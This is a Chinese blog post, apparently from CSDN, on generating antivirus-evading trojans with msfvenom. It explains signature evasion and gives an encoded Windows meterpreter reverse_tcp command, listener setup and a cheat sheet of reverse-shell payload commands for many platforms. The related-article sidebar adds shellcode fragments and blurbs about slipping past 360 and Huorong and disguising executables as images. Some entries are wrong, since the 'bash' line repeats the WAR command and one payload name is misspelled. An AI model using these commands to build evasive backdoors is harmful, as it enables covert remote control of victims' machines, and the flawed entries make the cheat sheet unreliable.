msf免杀木马生成

最新推荐文章于 2024-02-23 15:07:48 发布
最新推荐文章于 2024-02-23 15:07:48 发布
阅读量2.2k 收藏 21
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66985187/article/details/131534932
版权

免杀技术全称为反杀毒技术Anti Anti- Virus简称"免杀",它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编逆向工程系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。

本章是通过msf(msfvenom)命令实现免杀的操作

msf常用命令

  • -p: 指定payload模块
  • -l :列出可用项
  • -f :指定文件类型
  • -e:  加载编码器
  • -b:删除无效字符
  • -i :指定编码次数
  • -x: 捆绑文件
  • -o:导出文件

在kali中生成常见的木马命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=xxx.xxx.xxx.xxx lport=xxxx -f exe > shell.exe

开启监听模块

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp#设置攻击位

补充:常见的后门生成方式!!!!!

linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

android

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.apk

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.asp

aspx

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

bash

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

python

msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

兰汐儿
关注
  • 0
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
通过Python实现Payload分离免杀过程详解
01-19
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66 \x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x
强大的免杀工具,绝对震撼你!!!!
09-09
exe转jpg的工具,而且右键看属性也是jpg格式的,可别做坏事啊!!
生成windows执行木马程序
最新发布
LY2761800075的博客
02-23 1049
简单window木马程序
MSF(3)——apk和exe的加马(过360、火绒)
realmels的博客
08-07 6253
apk和exe加马免杀的方法
msf生成免杀木马
qq_56426046的博客
09-08 5275
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
简单的Msf木马免杀
weixin_47948655的博客
08-12 850
简单加密shellcode与加载器实现msf木马免杀
利用msfvenom制作windows木马免杀
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
msfvenom木马生成+免杀+壳(实测并不能免杀)
weixin_34342992的博客
02-14 1603
msfvenom 选项: -p, --payload 有效载荷使用。指定一个有效的自定义载荷 --payload-options 列出有效载荷的标准选项 -l, --list [type] 列出一个模块类型。选项有:有效载荷,编码器,NOP,所有 -n, --nopsled 在一个nopsled [长度]的大小对有效载荷 -f, --format 输出格式(使用-一个列表的帮助格式) --...
MSF免杀
LainWith的博客
12-12 2904
MSF 参考: 远控免杀专题文章(2)-msfvenom隐藏的参数 远控免杀专题文章(3)-msf免杀(VT免杀率35/69) msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。 参数 ![image.png](https://img
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
解读MSF团队管理的秘密
03-03
神出鬼末的缺陷,杀之不尽的缺陷,无止境的加班。对计算机完全失去兴趣,萌生转行的念头。……Ohmygod!这就是软件开发吗?在谈软件开发团队之前,我们先看看优秀的团队,都具备怎样的一些特点?英明的领袖优秀的...
MSF(2)——各种木马生成及简单的免杀
realmels的博客
06-11 3824
这里是各种木马生成示例 在实际渗透过程中根据需求生成这里主要是php的免杀和Python的免杀,原理都是自定义加密及解密可参考前文 https://blog.csdn.net/realmels/article/details/119280877重点来了使用上文方法生成木马,所有的木马都会报毒D盾扫描结果 火绒扫描结果 而对于exe的免杀比较复杂(主要我不会),所以在这里介绍一种简单的免杀方法。我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行免杀,最后将该木马打包成可
msf免杀
weixin_30662849的博客
04-13 276
卧槽 最近闲的没事干 搞一下渗透学习下 拿到 一个域成员权限,但是有360 。。。。(&……% 好烦啊 都不能免杀 突然看到一个帖子 很牛逼 依然到现在还是免杀的 首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 ...
Metasploit(msf)系列-木马免杀
chaojixiaojingang
10-10 9218
    木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 原理:        首先生成木马文件,然后将生成木马文件与shellter免杀工具捆绑,然后设置监听,将捆绑后的文件拷贝到WinXP系统中,双击后,发现攻击成功,最后将该文件在腾讯哈勃分析系统上分析。 准备: 靶    机:WinXP系统  ip:192.168.1.10...
MSF免杀木马生成
shy的博客
03-25 1453
启动msfconsole 查看evasion模块 选择合适的某块 usewindows/windows_defender_exe 配置payload set payload windows/meterpteter/reverse_tcp set lhost 192.168.44. set lhost 4444 ...
msf编码免杀
m0_61506558的博客
09-03 2403
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
msf生成linux木马
03-16
MSF是Metasploit Framework的缩写,是一款常用的渗透测试工具。要生成Linux木马,可以使用MSF中的payload生成器来创建一个适合Linux系统的payload,然后使用MSF中的exploit模块来利用漏洞,将payload注入到目标系统中,从而实现远程控制。具体操作可以参考MSF的官方文档或相关教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

兰汐儿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值